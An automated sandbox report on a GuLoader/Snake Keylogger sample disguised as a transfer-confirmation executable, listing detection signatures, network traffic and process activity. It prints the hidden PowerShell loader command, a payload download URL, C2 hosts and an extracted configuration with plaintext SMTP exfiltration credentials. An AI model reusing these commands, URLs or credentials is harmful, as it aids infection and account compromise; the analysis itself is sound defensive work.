Windows Analysis Report
Confirmation transfer Note AGS # 22-00379.exe

Overview

General Information

Sample name:	Confirmation transfer Note AGS # 22-00379.exe
Analysis ID:	1481030
MD5:	baf114ac8dab2634a6f9e33cc67c4b33
SHA1:	66da72ca66c33a928a401d160875f82af9f89bc0
SHA256:	87ab493612c1a0f03673ac9592df018f5f11f9222c03dd7d63b173d9dccb0848
Tags:	exe
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Powershell drops PE file

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "manjunath_y@bluewavecomputers.in", "Password": "Bluewave@mnc2020", "Host": "mail.bluewavecomputers.in", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: http://aborters.duckdns.org:8081	Virustotal: Detection: 11%	Perma Link
Source: http://anotherarmy.dns.army:8081	Virustotal: Detection: 14%	Perma Link
Source: http://varders.kozow.com:8081	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe	Virustotal: Detection: 58%			Perma Link

Multi AV Scanner detection for submitted file

Source: Confirmation transfer Note AGS # 22-00379.exe	ReversingLabs: Detection: 50%
Source: Confirmation transfer Note AGS # 22-00379.exe	Virustotal: Detection: 58%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses 32bit PE files

Source: Confirmation transfer Note AGS # 22-00379.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.7:49707 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\exe\wab.pdb_j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbVowV source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbd source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdbd source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\exe\wab.pdbwj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb7j source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n(C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: nC:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Program Files (x86)\windows mail\wab.PDB source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5987.tmp.dmp.18.dr
Source:	Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000002.00000002.1633101698.0000000008600000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BO$ .pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: wab.pdb-21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32``oj source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdblb source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb@ source: WER5987.tmp.dmp.18.dr
Source:	Binary string: wab.pdbaD source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1633571805.0000000008667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\windows mail\wab.PDB_ source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbBX source: powershell.exe, 00000002.00000002.1622648515.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr
Source:	Binary string: !symbols\exe\wab.pdb30 source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: wab.pdbws\wab.pdbpdbwab.pdbmail\wab.pdb source: wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\wab.pdbiB source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb` source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Xml.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: wab.pdb source: wab.exe, 0000000E.00000002.1940497135.00000000244F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939724868.0000000021E37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: mscorlib.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\wab.pdb source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbWj% source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb\| source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb& source: WER5987.tmp.dmp.18.dr
Source:	Binary string: C:\Windows\wab.pdbpdbwab.pdbq source: wab.exe, 0000000E.00000002.1925821576.000000000665E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER5987.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5987.tmp.dmp.18.dr

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 108.167.181.251 108.167.181.251
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown

DNS query: name: checkip.dyndns.org

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /wp-includes/NTivwvgavzbeiE97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-includes/NTivwvgavzbeiE97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org

Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.000000002201C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: wab.exe, 0000000E.00000002.1939925448.0000000022033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: powershell.exe, 00000002.00000002.1630220347.00000000075E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.1630220347.000000000754A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microw
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.18.dr	String found in binary or memory: http://upx.sf.net
Source: wab.exe, 0000000E.00000002.1939925448.0000000021F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1624752959.0000000004E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Confirmation transfer Note AGS # 22-00379.exe, Confirmation transfer Note AGS # 22-00379.exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000002.00000002.1624752959.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1630220347.000000000750A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1627675553.0000000005E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, 0000000E.00000002.1925821576.00000000065E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: wab.exe, 0000000E.00000002.1925821576.00000000065E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.bin

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown

HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.7:49707 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe

Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_00403358

Detected potential crypto function

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_048CEAD8	2_2_048CEAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_048CF3A8	2_2_048CF3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_048CE790	2_2_048CE790
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_02F23E09	14_2_02F23E09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_02F23A99	14_2_02F23A99
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_02F229E0	14_2_02F229E0

One or more processes crash

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532

PE / OLE file has an invalid certificate

Source: Confirmation transfer Note AGS # 22-00379.exe

Static PE information: invalid certificate

Uses 32bit PE files

Source: Confirmation transfer Note AGS # 22-00379.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/16@2/2

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7476
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 2532
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Scabriusculous=Get-Content 'C:\Users\user~1\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru';$Uregelmssighedernes=$Scabriusculous.SubString(19994,3);.$Uregelmssighedernes($Scabriusculous) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
